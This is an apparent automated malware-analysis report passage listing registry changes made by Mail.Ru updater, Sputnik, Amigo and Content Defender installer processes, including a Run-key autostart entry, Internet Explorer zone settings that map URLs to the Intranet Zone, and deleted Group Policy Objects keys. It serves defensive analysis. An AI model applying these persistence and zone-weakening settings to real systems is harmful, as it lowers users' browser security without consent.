"C8C18E59239C817C71A4DBC7E22110853F23711D"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process mailruhomesearchvbm.exe:2432 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 1F F8 55 97 EB C5 AC 65 28 D3 30 B3 DF 80 57"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "mailruhomesearchvbm.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{82C2671D-8B09-4846-A9BF-F942223CE6B7}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A176BC10-A726-4338-ADB4-78C839F63BB7}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2962FBE8-D041-4223-AFE8-D86AFE5085BE}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CE73A0B0-C5BA-473A-97BA-0FABF3D3765F}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5E946228-5FA9-46B6-A3B4-F0179E121F7C}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{CE73A0B0-C5BA-473A-97BA-0FABF3D3765F}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{C79DD998-4E70-4234-B403-3102B4DF8C0A}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{5E946228-5FA9-46B6-A3B4-F0179E121F7C}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{C79DD998-4E70-4234-B403-3102B4DF8C0A}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{A176BC10-A726-4338-ADB4-78C839F63BB7}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{2962FBE8-D041-4223-AFE8-D86AFE5085BE}User]

The process MailRuUpdater.exe:1632 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 2C A0 63 14 2F F5 A3 86 6F E9 1A 17 A3 A7 5F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1F8A0274-5E8D-44F6-8494-71D7AC4D9CA9}Machine]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1F8A0274-5E8D-44F6-8494-71D7AC4D9CA9}User]

The process MailRuUpdater.exe:916 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"Publisher" = "Mail.Ru"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"DisplayName" = "Служба автоматического обновления программ"

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{1D443B71-A607-4700-8FEE-F5634008A814}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Mail.Ru\Updater]
"Guid" = "{1D443B71-A607-4700-8FEE-F5634008A814}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMinor" = "17"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMajor" = "1"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru]
"MailRuUpdater.exe" = "Mail.Ru updater"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 7B F1 9B F3 53 79 C7 80 84 BF 88 D9 19 9A B2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application]
"amigo.exe"

The SpyTool disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater"

The process MailRuUpdater.exe:1028 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Mail.Ru\Tech\ptls\{4519D3B5-465C-4AE2-A905-960CA7D5385C}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcvN4jKaMdjJgwMnY97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru\Tech\ptls\{0ED2394C-62B6-4A80-A342-C2CA0B2A4E82}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Mail.Ru\Tech\ptls\{8DC7BF6A-58F3-4740-B600-34E37FFADC21}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = ""
"Desktop" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ie" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Mail.Ru\Tech\ptls\{603A8599-628C-4F00-A940-A09F1583A23E}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcvN4jKaMdjJgwMnY97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Mail.Ru\Tech\ptls\{4C1D0C36-25B2-4774-80E8-DAE1E7898A1A}]
"RUNID" = "12"

[HKCU\Software\Mail.Ru\Tech\ptls\{4947360E-E26B-4CC9-BB40-F4A30EDCA39E}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{66CD85E0-6D8E-444E-9D71-AED8BA171A26}]
"RUNID" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"CH" = "1"

[HKCU\Software\Mail.Ru\Tech\ptls\{66CD85E0-6D8E-444E-9D71-AED8BA171A26}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcvN4jKaMdjJgwMnY97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru]
"SicSettings" = "22 serialization::archive 11 0 0 1 0 0 0 0 0 20 0 0 1 0 0 0 0 24 0 0 0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 2B B3 D5 4E 87 4B F6 7A D3 C0 C9 BA E2 BC 11"

[HKCU\Software\Mail.Ru\Tech\ptls\{0E26AC42-4B6E-4C84-8291-A0CAC999E70D}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Mail.Ru\Tech\ptls\{E60E6A0E-4092-4965-85BB-AA1ED8EBBC8E}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcvN4jKaMdjJwwJmo97RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"finished_time" = "Type: REG_QWORD, Length: 8"

[HKCU\Software\Mail.Ru\Tech\ptls\{3CE4F0C3-2143-491F-8F20-27792166C41F}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ff" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKCU\Software\Mail.Ru\Tech\ptls\{4519D3B5-465C-4AE2-A905-960CA7D5385C}]
"RUNID" = "10"

[HKCU\Software\Mail.Ru\Tech\ptls\{B63A6D16-4F50-47C2-9BF7-A5D6E79C9EFD}\ch]
"gdup" = "LlybSVbttQqpAxIsKaevGioKg0tb/axI90ISNjiusCMQPfcvN4jKaMdjJwwJm497RzqlYn6a0mjPbCJRSMjiN3RK2RVA8uxI6FUNXA=="

The SpyTool deletes the following registry key(s):

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{59E36A73-ACA5-4B47-B37A-85108A7E9264}Machine]
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{59E36A73-ACA5-4B47-B37A-85108A7E9264}User]
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Mail.Ru\Tech\ptls\{F581DE96-9AA1-45C8-8335-B7445525371A}]
"ch"
"ff"
"ie"

The process %original file name%.exe:560 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\4B259EC6-7CC5-491E-8AEF-D3E124038DAA]
"mailruhomesearchvbm.exe" = "MailRuSputnik"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\AFBFDDD2-8547-49D1-8A41-B824ECBC9A42]
"05a00036.exe" = "05a00036"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\65025299-7BA0-4969-BF1C-4323DC267C7A]
"AmigoDistrib.exe" = "Amigo Installer"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\d24f367079cc483e84027cd8d8ae770d\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\62628F9A-B2BE-4252-8717-CB1BCEA9FE66]
"mailruhomesearch.exe" = "MailRuSputnik"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 8F 0A E5 3D 8D 98 0A AF 7B F7 CD 15 97 84 B2"

[HKCU\Software\IM]
"1470" = "15-12-25 22:38:16"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKCU\Software\IM]
"1407" = "15-12-25 22:38:28"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\503031B8-564A-4828-993D-4F6CC32B108C]
"condefsetup (19).exe" = "Content Defender Setup"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\d24f367079cc483e84027cd8d8ae770d\DEBUG]
"Trace Level"

The process condefsetup (19).exe:348 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"EstimatedSize" = "6000"
"Publisher" = "Artex Management S. A."

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"InstallDate" = "20141225"

"DisplayVersion" = "1.80"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"MRUListEx" = "00 00 00 00 02 00 00 00 01 00 00 00 03 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\ContentDefender]
"CampaignID" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\condef]
"Tag" = "8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayIcon" = "%Program Files%\Content Defender\ConDefSetup.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayName" = "Content Defender"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU\0]
"MRUListEx" = "02 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\ContentDefender]
"SourceId" = "106"
"ff" = "yes"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"UninstallString" = "%Program Files%\Content Defender\ConDefSetup.exe uninst=1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"NodeSlots" = "02 02 02 02 02 02 02 02 02 02 02 02"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A D5 69 92 2F 0E 52 BA D0 60 B0 FF D1 20 2E 7F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 50 74 A1 FC 53 3F D1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

